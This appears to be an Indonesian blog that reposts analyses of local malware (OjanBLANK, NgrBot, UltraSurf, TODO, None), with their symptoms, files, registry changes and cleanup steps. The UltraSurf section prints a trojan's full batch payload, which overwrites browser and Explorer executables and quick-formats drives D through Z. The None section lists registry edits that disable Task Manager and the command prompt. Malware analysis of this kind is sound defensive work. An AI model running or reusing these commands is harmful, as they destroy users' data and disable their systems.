Pages

Jumat, 23 September 2011

W32/Smalltroj.XLHU Virus/Antivirus?

OBAV antivirus, Madu atau Racun ?
PERINGATAN
Bahwa pada Detik ini,
Menit ini,
Jam ini,
Tanggal ini,
Bulan ini,
dan Tahun ini
KOMPUTER Kesayangan anda Terinfeksi
Viruz ojanBLANK
Selain virus lokal yang banyak bermunculan di Indonesia, banyak antivirus lokal yang muncul dan terbukti cukup tangguh membasmi virus-virus lokal, baik yang suka omong besar maupun yang tidak. Seperti Smadav, Anvi, PCMav, Ansav dan Avigen. Lucunya, ada satu virus yang menempuh cara yang kontradiktif dalam memperkenalkan produk antivirus lokal. Vaksincom tidak mengetahui apakah pembuat virus ini memiliki hubungan dengan pembuat antivirus dengan nama OBAV (OjanBlank AntiVirus .....sambil geleng2 kok milih nama OjanBlank ..... bukan OjanSarung atau OjanPeci) tetapi yang jelas komputer yang terinfeksi virus W32/SmallTroj.XLHU ini akan menampilkan pesan yang sama dengan nama antivirus lokal yang dipromosikan (lihat gambar 6) dibawah. Kalau melihat fakta di atas ini masih ada ngotot dan mencoba-coba menggunakan program antivirus OBAV ...... anda tinggal tanya sama J-Rocks, yang anda download itu Madu atau Racun.
Serangan virus-virus komputer kembali datang, dan kali ini berasal dari berbagai varian virus lokal. Dari beberapa varian virus lokal yang mulai aktif menyerang, terdapat salah satu virus yang menyerang pengguna komputer di Indonesia, diantaranya yang terdeteksi adalah W32/Smalltroj.XLHU atau OjanBLANK.
Virus OjanBLANK memiliki kemampuan sama seperti halnya virus lokal yang lain, hanya saja virus ini juga memiliki kemampuan seperti penyusup yang membaca aktivitas anda dan mengirimkan informasi kepada si pembuat virus. Untuk dapat melakukan tersebut, pembuat virus tidak hanya membuat file virus untuk menginfeksi, tetapi juga terdapat file trojan yang disisipkan dan digunakan untuk memantau aktivitas jaringan internet. Cara pembuat virus memiliki kesamaan dengan varian virus terdahulu seperti Rontokbro atau Kangen, yang memiliki file pendamping untuk mengirimkan informasi kepada si pembuat virus. Norman Virus Control mendeteksi OjanBLANK sebagai Trojan:W32/Smalltroj.XLHU (lihat gambar 1)
 

Gambar 1. Norman mendeteksi varian virus OjanBLANK
Gejala & Efek Virus

Beberapa gejala dan efek yang terjadi jika anda terinfeksi virus ini adalah sebagai berikut :
  • Hidden Process

Bagi para pengguna komputer, Windows Task Manager merupakan salah satu tools Windows yang sangat bermanfaat terutama untuk melihat aplikasi/proses yang berjalan di komputer anda. Virus OjanBLANK berusaha menyembunyikan proses program yang berjalan, sehingga anda tidak mudah untuk mengetahui proses virus yang aktif dan tidak dapat mematikannya dengan mudah. (lihat gambar 2)
 
Gambar 2. Aktivitas program disembunyikan oleh virus OjanBLANK

  • Memantau Koneksi Internet

Berbeda halnya dengan kebanyakan virus mancanegara, virus OjanBLANK juga mencoba memantau koneksi internet untuk memastikan kondisi internet aktif atau tidak yang digunakan sebagai akses ke server pembuat virus. Tetapi, virus memantau koneksi internet dengan menjalankan beberapa file Windows yang berhubungan dengan internet. (lihat gambar 3)
 
Gambar 3. Virus memantau koneksi internet
Hal ini digunakan untuk memastikan dapat mengirim informasi / data ke si pembuat virus.

  • Matikan Windows Firewall

Untuk melengkapi kelancaran pengiriman informasi / data saat terkoneksi internet, maka virus OjanBLANK mematikan salah satu fitur Windows yaitu Windows Firewall. Dengan mematikan fitur ini, akses keluar masuk informasi dapat lebih mudah terpantau oleh si pembuat virus tanpa di halang-halangi oleh Windows Firewall. (lihat gambar 4)
Gambar 4. Virus OjanBLANK mematikan fitur Windows Firewall

  • Membuka Web tertentu

Jika komputer yang terinfeksi virus OjanBLANK sedang terkoneksi internet, terkadang jendela Internet Explorer/Mozilla akan terbuka secara tiba-tiba dan meng-akses web / situs tertentu. Web/situs yang akan terbuka yaitu : (lihat gambar 5)


Gambar 5. Jendela Internet Explorer yang muncul dan membuka web tertentu
Web / situs tersebut menampilkan sebuah web yang telah dibuat oleh si pembuat virus.

  • Mematikan proses Windows Explorer

Untuk mengganggu aktifitas user, virus OjanBLANK akan mencoba mematikan jendela Windows Explorer dan memunculkan sebuah form yang menutupi seluruh desktop. Hal ini akan dilakukan jika anda berusaha mematikan virus dengan mencoba menjalankan file / folder yang mengandung kata process atau proses. (lihat gambar 6)
Gambar 6. Form yang terbuka menutupi seluruh desktop
Jika tetap mencoba membuka file / folder yang memiliki string tersebut diatas, program / software tersebut akan menutup dan yang terbuka adalah form yang dibuat oleh virus OjanBLANK.

  • Membuka file word

Terkadang, virus OjanBLANK akan membuka sebuah file MS Word yang berisi sebuah peringatan bahwa komputer telah terinfeksi virus. (lihat gambar 7)
Gambar 7. File MS Word yang terbuka
File Virus

Virus OjanBLANK dibuat dengan menggunakan script bahasa Visual Basic 6 (VB6). Jika virus berhasil menginfeksi komputer, maka akan membuat beberapa file utama sebagai berikut :
  • C:\Readme.exe
  • C:\WINDOWS\system32\junx.exe
  • C:\WINDOWS\system32\WinGUI.exe (lihat gambar 8)

Gambar 8. File virus OjanBLANK

Selain itu jika komputer memiliki partisi drive lain atau memiliki mapping drive, maka virus OjanBLANK akan membuat file virus yaitu :
  • Readme.exe (semua drive)
Ciri-ciri file virus OjanBLANK yaitu :
  • Menggunakan icon MS Word.
  • Memiliki ukuran file 224 kb
  • Memiliki type file application
File Trojan dan pendamping

Selain file virus, virus OjanBLANK juga menyisipkan beberapa file yang salah satunya adalah file trojan yang digunakan untuk mengirimkan informasi / data kepada si pembuat virus. Beberapa file tersebut yaitu :
  • C:\WINDOWS\system32\MSWINSCK.OCX (Microsoft Winsock Control Dll), merupakan file / modul yang digunakan untuk melakukan kontrol terhadap Winsock (Windows Socket). File ini sering digunakan oleh trojan dan spyware sebagai kontrol terhadap aktivitas koneksi internet.
  • C:\WINDOWS\system32\ijl11.dll (Intel JPEG Library versi 1.1), merupakan file/library yang digunakan untuk melakukan konversi gambar menjadi format file JPG pada aplikasi Visual Basic (VB). File ini sering digunakan oleh trojan dan spyware karena mudah terintegrasi dengan browser seperti Internet Explorer.
  • C:\WINDOWS\system32\ms.exe, merupakan file trojan / penyusup yang digunakan oleh si pembuat virus agar dapat melakukan remote dan dapat mengirimkan informasi / data.
  • C:\WINDOWS\system32\b.doc, merupakan file MS Word yang berisi peringatan virus OjanBLANK.
Metode Penyebaran

Sama seperti varian virus lokal yang lain, virus OjanBLANK masih memanfaatkan penggunaan removable drive seperti flashdisk, external harddisk, dll sebagai media penyebaran virus. (lihat gambar 9)

Gambar 9. File virus infeksi flashdisk / removable drive

Selain itu, dalam jaringan akan memanfaatkan file sharing (full) dan mapping drive dengan membuat file virus yang sama yaitu ReadMe.exe.
Modifikasi Registry

Walaupun banyak hal yang dilakukan oleh virus OjanBLANK, ternyata tidak banyak perubahan yang dilakukan pada Registry Windows. Hal ini tentunya sangat berbeda dengan bila dibandingkan virus-virus lokal yang lain, yang masih melakukan proteksi dan perubahan pada Registry Windows. Beberapa modifikasi registry yang dilakukan oleh virus OjanBLANK yaitu :
  • Menambah registry
    • Startup

Agar virus dapat aktif pada saat start-up, maka virus membuat string berikut :

    • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Microsoft Word Agents = C:\WINDOWS\system32\WinGUI.exe
Microsoft Office Agents = C:\WINDOWS\system32\junx.exe

Dengan tidak banyak melakukan perubahan registry, virus OjanBLANK sangat mengandalkan kemampuan pada virusnya tersebut.
Pembersihan Virus

Langkah-langkah yang harus dilakukan untuk melakukan pembersihan virus adalah :
  • Putuskan koneksi jaringan / internet.
  • Matikan System Restore (lihat gambar 10)
    • Klik kanan My Computer, pilih Properties.
    • Pilih tab System Restore, beri ceklist pilihan Turn off System restore
    • Klik Apply, Klik OK.

Gambar 10. Matikan System restore

  • Matikan proses virus (dengan Command Prompt).
    • Klik Menu [Start] à [All Programs] à [Accessories] à [Command Prompt]
    • Pada Command Prompt, ketik perintah “Tasklist (hal ini untuk melihat proses virus yang aktif yaitu “WinGUI.exe atau junx.exe) (lihat gambar 11)

Gambar 11. Perintah tasklist, agar mengetahui proses virus yang aktif

    • Setelah mengetahu proses virus yang aktif, matikan proses virus dengan menjalankan/ketik perintah Taskkill sebagai berikut : (lihat gambar 12)

Taskill /f /im WinGUI.exe
atau
Taskill /f /im junx.exe
Gambar 12. Matikan virus dengan perintah Taskkill

  • Repair Registry Windows

Perbaiki Registry Windows yang sudah di modifikasi oleh virus dengan langkah sebagai berikut :

    • Salin script dibawah ini dengan menggunakan notepad :

[Version]
Signature="$Chicago$"
Provider=Vaksincom Oyee
[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del
[UnhookRegKey]
HKLM, Software\CLASSES\batfile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\comfile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\exefile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\piffile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\regfile\shell\open\command,,,"regedit.exe "%1""
HKLM, Software\CLASSES\scrfile\shell\open\command,,,"""%1"" %*"
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, Shell,0, "Explorer.exe"
HKLM, SYSTEM\ControlSet001\Control\SafeBoot, AlternateShell,0, "cmd.exe"
HKLM, SYSTEM\CurrentControlSet\Control\SafeBoot, AlternateShell,0, "cmd.exe"
HKLM, SOFTWARE\Classes\exefile\DefaultIcon,,,""%1" %"
[del]
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Run, Microsoft Word Agents
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Run, Microsoft Office Agents

    • Simpan file dengan nama repair.inf. Gunakan pilihan Save As Type menjadi All Files agar tidak terjadi kesalahan.
    • Klik kanan file repair.inf, kemudian pilih install
    • Restart komputer.
  • Hapus file induk serta file duplikat yang dibuat oleh virus OjanBLANK, dimana file tersebut mempunyai ciri-ciri sebagai berikut :
    • Ukuran file 224 KB
    • Berekstensi exe
    • Memiliki icon MS Word
    • Type file application.
  • Hapus file trojan dan file pendamping virus, yaitu sebagai berikut :
    • C:\WINDOWS\system32\MSWINSCK.OCX
    • C:\WINDOWS\system32\ijl11.dll
    • C:\WINDOWS\system32\ms.exe
    • C:\WINDOWS\system32\b.doc
  • Untuk pembersihan yang optimal dan mencegah infeksi ulang, sebaiknya menggunakan antivirus yang ter-update dan mengenali virus ini dengan baik.
Silahkan Zoom Gambar Dengan Menyeret Gambar Ke Tab Web Anda
Sumber : Vaksin.com Web

Kamis, 22 September 2011

Penanganan Virus NgrBot

Bagi Yang Ingin Menghapus Virus NgrBot Secara Express Dapat Memakai :

PCMAV Express for NgrBot

 

NgrBot
Malware canggih dengan kemampuan rootkit terus bermunculan. NgrBot adalah contoh terbaru trojan yang mampu mencuri data identitas/password Anda saat berselancar di Internet.
Media penyebaran NgrBot cukup luas, ia dapat menginfeksi komputer melalui shortcut dan autorun.inf yang dibuat pada flashdisk yang terinfeksi, juga menyebar melalui link jejaring sosial maupun chat pada client messenger. Setelah aktif,  ia akan memblok sejumlah website antivirus dan melakukan koneksi ke web-web tertentu, karena itu sangat disarankan Anda memutuskan terlebih dahulu koneksi Internet sebelum melakukan pembersihan.
Nama NgrBot sendiri diambil dari string yang terdapat pada tubuh malware yang telah di-decrypt, trojan ini stealth di memory, dan juga melindungi filenya dengan melakukan hook API function tertentu sehingga file tersebut tidak terlihat oleh pengguna.
Pembahasan lebih lanjut telah dibahas
PCMAV Express for NgrBot dibuat untuk membersihkan NgrBot yang in-the-wild, menghentikan proses NgrBot di memory komputer yang terinfeksi, melakukan unhook API function dan mendeteksi serta menghapus file NgrBot yang tersembunyi.
Aturan Penggunaan:
  1. Jalankan PCMAV for NgrBot.
  2. Pastikan user Anda memiliki hak setara Administrator.
  3. Nonaktifkan fungsi Autorun (link referensi: http://support.microsoft.com/kb/967715).
  4. Pasang flashdisk yang terinfeksi pada komputer agar ikut dibersihkan oleh PCMAV Express for NgrBot.
  5. Pastikan komputer Anda *tidak* terkoneksi ke jaringan atau Internet selama proses scan.
  6. Setelah selesai, sangat disarankan untuk melakukan restart dan scan ulang (jika perlu).
  7. Pastikan seluruh PC yang telah terhubung di dalam jaringan juga telah bebas NgrBot, sebelum PC Anda kembali terkoneksi ke jaringan.
Secara regular engine utama PCMAV akan di-update mengikuti perkembangan NgrBot.
Pada halaman ini kami juga menyediakan PCMAV Express for NgrBot untuk di-download pada link dibawah ini (link dapat berubah jika ada update baru).
Last Update (14-09-2011):
Total 10 varian NgrBot yang sudah bisa dibasmi menggunakan PCMAV Express for NgrBot:
- NgrBot.A
- NgrBot.B
- NgrBot.C
- NgrBot.D
- NgrBot.E
- NgrBot.F
- NgrBot.G
- NgrBot.H
- NgrBot.I
- NgrBot.J
Download PCMAV Express for NgrBot

NgrBot: Trojan Pengambil Identitas/Password

Ringkasan ini tidak tersedia. Harap klik di sini untuk melihat postingan.

UltraSurf: Memformat Semua Hard Disk

Kali Ini saya akan membahas virus ini dan cara pembersihanya melalui PC-MAV :

UltraSurf
UltraSurf. Beberapa waktu yang lalu, di forum virusindonesia.com ada salah seorang user yang sengaja mempublikasikan salah satu aplikasi dengan nama UltraSurf. Dengan mengatakan bahwa aplikasi UltraSurf ini dapat mem-bypass proxy dan membuat user bisa mengakses setiap website yang di blok. Sekilas aplikasi ini memang mirip aplikasi UltraSurf yang sebenarnya, tetapi hal buruklah yang akan user alami jika menggunakan aplikasi tipuan ini karena sudah dipastikan user akan kehilangan seluruh data di hard disknya.

A. Info File
Nama Worm : UltraSurf
Asal : Indonesia
Ukuran File : Random
Packer : UPX 0.89 – 3.xx -> Markus & Laszlo ver. [ 3.07 ]
Pemrograman : Delphi
Icon : Random
Tipe : Trojan, Worm
B. About Malware
UltraSurf
Variant pertama dari UltraSurf kami dapatkan berasala dari Jakarta. Mungkin hanya buatan orang yang memang berniat untuk menghapus setiap data user yang terdapat pada drive lain selain drive C. Hal ini dimaksudkan agar malware tetap bisa menjalankan aksinya untuk memformat setiap drive setelah di jalankan.
Seperti yang terlihat pada gambar di atas, UltraSurf berasal dari Indonesia. Setelah di UnPack, sangat terlihat tujuan dari UltraSurf setelah dijalankan oleh user.
UltraSurf
C. Companion/File yang dibuat
UltraSurf
Setelah user menjalankan UltraSurf, malware ini akan membuat 1 buah file dengan nama ultrasurf.bat di folder temporary. Pada variant D, file bat yang dibuat menggunakan nama “alaskan ip.bat”.  Batch file ini hanya bersifat sementara yang dibuat setelah UltraSurf di jalankan dan otomatis dihapus setelah selesai mengeksekusi seluruh perintahnya.
D. Hasil Infeksi
Dengan perintah-perintah bat file ini, jelas benar-benar terlihat apa saja yang akan dilakukan oleh UltraSurf.
Menghentikan proses dengan nama idman.exe, firefox.exe, explorer.exe
taskkill /f /im idman.exe
taskkill /f /im firefox.exe
taskkill /f /im explorer.exe
mengcopy file hostnya dan melakukan overwrite ke beberapa file seperti IDMan.exe, firefox.exe, explorer, explorer.exe
xcopy ultrasurf.exe /h /r /c /y "C:\Program Files\Internet Download Manager\IDMan.exe"
xcopy ultrasurf.exe /h /r /c /y "C:\Program Files\Mozilla Firefox\firefox.exe"
xcopy ultrasurf.exe /h /r /c /y "C:\windows\explorer"
xcopy ultrasurf.exe /h /r /c /y "C:\windows\explorer.exe"
Memformat semua hard disk mulai dari drive D sampai Z.
echo.
Format D: /Q /X /y
echo.
Format E: /Q /X /y
echo.
Format F: /Q /X /y
echo.
Format G: /Q /X /y
echo.
Format H: /Q /X /y
echo.
Format I: /Q /X /y
echo.
Format J: /Q /X /y
echo.
Format K: /Q /X /y
echo.
Format L: /Q /X /y
echo.
Format M: /Q /X /y
echo.
Format N: /Q /X /y
echo.
Format 0: /Q /X /y
echo.
Format P: /Q /X /y
echo.
Format Q: /Q /X /y
echo.
Format R: /Q /X /y
echo.
Format S: /Q /X /y
echo.
Format T: /Q /X /y
echo.
Format U: /Q /X /y
echo.
Format V: /Q /X /y
echo.
Format W: /Q /X /y
echo.
Format X: /Q /X /y
echo.
Format Y: /Q /X /y
echo.
Format Z: /Q /X /y
Dan yang terakhir adalah melakukan proses shuting down
start shutdown.exe -f -t 0 –s
Meskipun tidak membuat host untuk dijadikan startup, UltraSurf memanfaatkan user yang tidak tidak tahu bahwa file firefox.exe sudah di hapus dan digantikan dengan host UltraSurf. Selain itu IDMan.exe adalah salah satu file dari software Internet Download Manager yang di jalankan saat startup, jadi UltraSurf yang sudah mengganti file IDMan.exe dengan host buatannya akan berjalan saat startup.
E. Pembersihan
UltraSurf
PCMAV 5.4 Update Build1
Untuk membasmi virus ini ataupun varian virus lainnya, PCMAV 5.4 Update Build1 telah hadir dengan penambahan 29 pengenal varian virus baru. Bagi Anda pengguna PCMAV 5.4, sangat disarankan segera melakukan update, agar PCMAV Anda dapat mengenali dan membasmi virus lebih banyak lagi.

NgrBot Variant: Hati-hati Account Facebook Anda






 Kali Ini saya akan membahas virus ini dan cara pembersihanya melalui PC-MAV :

NgrBot 




















NgrBot Variant. Jangan merasa aneh jika salah satu kawan facebook Anda secara tiba-tiba mengirimkan chat yang berisi sebuah link/URL dan membuat penasaran lalu mengakses link tersebut. Setelah di buka, ternyata link tersebut mengarahkan untuk mendownload file dengan nama seperti yang terlihat pada gambar diatas. Sayangnya, file yang akan di download nantinya bukanlah file gambar dengan ekstensi (.jpg) melainkan file lain.

A. Info File
Nama Worm : NgrBot.D, NgrBot.E, NgrBot.F, NgrBot.G
Asal : Unknown
Ukuran File : Random
Packer : ~
Pemrograman : C++
Icon : Random
Tipe : Worm, Trojan, Keylogger
B. About Malware
Salah satu varian NgrBot sebelumnya sudah pernah di bahas di “http://virusindonesia.com/2011/08/09/ngrbot-trojan-pengambil-identitaspassword/” dan removernya (PCMAV Express for NgrBot) sudah bisa di dapatkan di sini “http://virusindonesia.com/2011/08/09/pcmav-express-for-ngrbot/”. Berikut adalah icon yang digunakan NgrBot.A sampai NgrBot.C dengan ciri khasnya yang membentuk karakter tertentu.
NgrBot.A
NgrBot.B
NgrBot.C
Dan sekarang sudah menyebar juga varian lainnya. Antara lain NgrBot.D dan NgrBot.E yang tidak lagi menggunakan icon berbentuk karakter, melainkan icon menyerupai image.
NgrBot.D
NgrBot.E
Varian lainnya yaitu NgrBot.F yang menggunakan icon bernuansa pornografi. Tergantung variannya, NgrBot membuat beberapa mutex yang berbeda, antara lain seperti terlihat dibawah ini.
Mutex
C. Companion/File yang dibuat
Tidak jauh berbeda dengan varian sebelumnya , setelah aktif di memory NgrBot akan mendownload beberapa file yang nantinya dijalankan pada saat startup Windows.
D. Pembersihan
Gunakan update build untuk mendeteksi keberadaan NgrBot, jika NgrBot telah menjangkiti komputer, gunakan PCMAV Express for NgrBot pada halaman http://virusindonesia.com/2011/08/09/pcmav-express-for-ngrbot/ untuk pembersihan secara menyeluruh.
PCMAV 5.4 Update Build2
Untuk membasmi virus ini ataupun varian virus lainnya, PCMAV 5.4 Update Build2 telah hadir dengan penambahan 49 pengenal varian virus baru. Bagi Anda pengguna PCMAV 5.4, sangat disarankan segera melakukan update, agar PCMAV Anda dapat mengenali dan membasmi virus lebih banyak lagi.

TODO: Bersembunyi Di Balik Process



 Kali Ini saya akan membahas virus ini dan cara pembersihanya melalui PC-MAV :

 








TODO. Rootkit adalah salah satu teknik yang sering digunakan malware yang menyebar di masyarakat belakangan ini. Komputer yang terinfeksi seolah-olah berjalan dengan normal tanpa adanya gangguan dari malware. Memang terkadang tidak terlalu mempengaruhi kinerja komputer, karena beberapa malware melakukan payload yang tidak mengganggu aktivitas user agar tetap tidak diketahui keberadaannya, dan ini adalah salah satu perbedaan umum antara kebanyakan malware lokal dan malware yang berasal dari luar.  Seperti halnya TODO yang diam-diam berjalan dan tetap memberikan keuntungan lebih bagi pembuatnya (Virus Maker).
A. Info File
Nama Worm : TODO
Asal : Rusia (dugaan)
Ukuran File : 325 KB (333,312 bytes)
Packer : UPX -> Markus & Laszlo ver. [ 3.02 ]
Pemrograman : Microsoft Visual C++
Icon : Application
Tipe : Trojan, Rootkit
B. About Malware

Namanya di ambil dari Original File Name yang menunjukan nama TODO. Malware ini didapatkan setelah salah satu variant worm yang menyebar lewat facebook “Chat-Facebook” tengah dianalisa dan didapatkan mendownload malware ini, TODO dapat aktif setelah droppernya dijalankan. Dan droppernya bersembunyi di balik proses svchost.exe. Baik host TODO maupun droppernya (TODO.drp) sama-sama dibuat menggunakan pemrograman Microsoft Visual C++ dan dikompres menggunakan UPX yang ukuran sebenarnya adalah:
TODO setelah di-pack = 325 KB (333,312 bytes)
TODO sebelum di-pack = 847 KB (867,328 bytes)
TODO.drp setelah di-pack = 35.5 KB (36,352 bytes)
TODO.drp setelah di-pack = 86.0 KB (88,064 bytes)
C. Companion/File yang dibuat
Setelah aktif di memory, Trojan TODO melakukan pengecekan terhadap companionnya (TODO.drp) yang berfungsi untuk menyembunyikan prosesnya di memory. Selain itu, jika TODO.drp sudah aktif terlebih dahulu, maka akan melakukan hal yang sama untuk melakukan pengecekan kemudian menjalankan TODO dan yang terakhir adalah menyembunyikan prosesnya dibalik proses lain.

Process scvhost.exe palsu


Hasil Deteksi GMER

D. Hasil Infeksi
Tentunya agar mampu berjalan otomatis saat proses startup, TODO.drp membuat sebuah value key di registry. Dan yang menarik adalah bahwa TODO memang menunjukan aktivitas rootkit. Selain itu, TODO berusaha mengakses salah satu IP yang setelah di Trace, IP tersebut berasal dari Sweden / Swedia.
Network Connection 1

Network Connection 2

Trace IP

E. Pembersihan

Short Information:
Chat-Facebook sendiri sebenarnya memiliki beberapa tipe, ada yang hanya berfungsi sebagai Downloader (Trojan)dan beberapa ada yang memang membuat host dan menyebar layaknya worm. Sayangnya, Chat-Facebook diduga memiliki kemampuan untuk mengecek tanggal yang nantinya hanya akan berjalan sesuai tanggal yang ditentukan, selain itu akan menghapus host file yang sedang di analisa. Hal ini mungkin dimaksudkan untuk menghindari kegiatan Tracing dan Debugging dalam proses analisanya.
PCMAV 5.5 Update Build1
Untuk membasmi virus ini ataupun varian virus lainnya, PCMAV 5.5 Update Build1 telah hadir dengan penambahan 26 pengenal varian virus baru. Bagi Anda pengguna PCMAV 5.5, sangat disarankan segera melakukan update, agar PCMAV Anda dapat mengenali dan membasmi virus lebih banyak lagi.
Untuk mendapatkan dan menggunakan update PCMAV ini, Anda cukup menjalankan PCMAV.exe, komputer harus dalam keadaan aktif terhubung ke Internet. Jika koneksi Internet menggunakan proxy, tentukan konfigurasi proxy pada file proxy.txt . Fitur Automatic Updates dari PCMAV akan secara otomatis men-download dan meng-update database dari PCMAV. Anda juga dapat mengupdate kapan saja dengan klik kanan icon PCMAV pada system tray dan pilih Update.

None: Windows ‘Terbaik’ Sepanjang Masa

Kali Ini saya akan membahas virus ini dan cara pembersihanya melalui PC-MAV :

hex
None. Screenshot diatas merupakan pesan yang nantinya akan di tampilkan malware tipe worm yang kami dapatkan baru-baru ini. Selain banyaknya laporan worm yang menyebar lewat Facebook, masih ada saja virus maker lokal yang membuat malware yang bisa dikatakan cukup berbahaya. Terutama bagi user yang telah terinfeksi worm ini. Karena selain sulit mengendalikan cursor mouse, Start Menu pada taskbar dibuatnya selalu bergerak/animasi.
A. Info File
Nama Worm : None
Asal : Indonesia
Ukuran File : 55.1 KB (56,462 bytes)
Packer : ~
Pemrograman : MS Visual Basic 5.0/6.0
Icon : Ms. Word Document
Tipe : Worm
B. About Malware
Sudah jatuh, tertimpa tangga pula” mungkin adalah ungkapan yang bisa mewakili pengguna yang komputernya terinfeksi malware yang kami beri nama None ini. Diduga None menyebar dengan memanfaatkan Social Engineering (rekayasa sosial) berupa nama yang sekilas dapat membuat user lengah. cara_menghapus_virus_win32_ramnit_sality.rar adalah nama yang digunakan untuk mengelabui user. Didalamnya terdapat juga file induk dari malware yang berukuran 2MB dan menggunakan icon dokumen Microsoft Word 2007.
None akan menampilkan pesan:
message

SELAMAT ! WINDOWS ANDA SEKARANG MEMILIKI UPDATE SYSTEM WINDOWS YANG TERBARU, TERBAIK SEPANJANG MASA … !!! Ada masalah setelah instalasi ? Silakan kunjungi **********sini.com/foto-ovj

Jika user membuka URL tersebut, maka akan langsung diarahkan ke salah website porno. Yang menarik adalah teknik yang digunakan setelah malware aktif di memory. Malware ini sengaja di buat dengan ukuran file melebihi 1MB yang bisa jadi dimaksudkan sebagai salah satu cara untuk mencoba melewati teknik pendeteksian heuristik dari antivirus untuk sebuah file PE. Setelah user melihat pesan di atas, None akan secara otomatis memotong dirinya sendiri dan membuat host untuk di jalankan saat startup. Ukuran asli None adalah 55.1 KB, sedangkan source yang membuat ukuran file ini menjadi 2MB hanyalah sebuah baris kosong . Berikut ini adalah perbedaannya:
hexfooter
note: perhatikan pada nilai offset gambar awal screenshot dan gambar di atas ini. Terlihat bahwa text pesan sudah tidak ada lagi seperti pada gambar awal.
C. Companion/File yang dibuat
Seolah-olah worm ini membuat file baru di beberapa path, padahal file tersebut adalah file yang sama seperti file asli, hanya saja ada bagian kode None yang dihilangkan. None akan membuat 2 buah host setelah aktif di memory.
- C:\WINDOWS\system32\regsvc.exe
- C:\Documents and Settings\[user name]\Local Settings\Temp\setup.exe
temp
D. Hasil Infeksi
Mungkin bagi beberapa user yang sudah lama mengikuti perkembangan malware di Indonesia, pernah mendengar worm dengan nama RazorBlade. Setelah aktif worm ini membuat cursor mouse bergerak sendiri secara acak. Terlebih lagi tombol Caps Lock dan Num Lock akan otomatis aktif secara bergantian tanpa di dikendalikan oleh user. Sama halnya dengan None, yang setelah aktif sangat sulit mengendalikan cursor. Meskipun demikian, benar adanya jika ada istilah “tak ada gading yang tak retak”, karena user sebenarnya masih bisa menggunakan Windows Explorer dan masuk ke tiap folder dengan menggunakan fasilitas tombol tab pada keyboard.
Seluruh icon di dekstop akan dibersihkan hingga tidak ada satupun shortcut yang tersisa, file yang terdapat di desktop juga akan dihapus. Selain itu tombol Start Menu akan berjalan ke kanan dan ke kiri dengan sendirinya dan tampilan Date and Time pada taskbar di hilangkan dari Tray Icon. Terlebih lagi None melakukan takskill terhadap aplikasi yang namanya mengandung kata seperti Anti, Virus, Remover, Process, dan lain lain.
Start Menu
Berikut ini adalah value key yang di buat pada registry setelah worm None aktif:
* Disable Folder Options dan Run Command
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
-NoFolderOptions
-NoRun
* Disable Task Manager dan Registry Editors
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system]
-DisableTaskMgr
-DisableRegistryTools
* Disable Command Prompt

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System]
-DisableCMD
* Berjalan bersamaan dengan explorer.exe
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="Explorer.exe regsvc.exe"
E. Pembersihan
Untuk membersihkan worm None, ganti nama folder serta nama file PCMAV menjadi nama lain, kemudian jalankan PCMAV seperti biasa. Check list drive yang akan di scan, jika mendapat kesulitan dalam menekan tombol “Scan Now”, bisa lansung menekan tombol Enter atau memanfaatkan tombol tab pada keyboard.
Deteksi
PCMAV 5.4 Update Build3
Untuk membasmi virus ini ataupun varian virus lainnya, PCMAV 5.4 Update Build3 telah hadir dengan penambahan 70 pengenal varian virus baru. Bagi Anda pengguna PCMAV 5.4, sangat disarankan segera melakukan update, agar PCMAV Anda dapat mengenali dan membasmi virus lebih banyak lagi.
Untuk mendapatkan dan menggunakan update PCMAV ini, Anda cukup menjalankan PCMAV.exe, komputer harus dalam keadaan aktif terhubung ke Internet. Jika koneksi Internet menggunakan proxy, tentukan konfigurasi proxy pada file proxy.txt . Fitur Automatic Updates dari PCMAV akan secara otomatis men-download dan meng-update database dari PCMAV. Anda juga dapat mengupdate kapan saja dengan klik kanan icon PCMAV pada system tray dan pilih Update.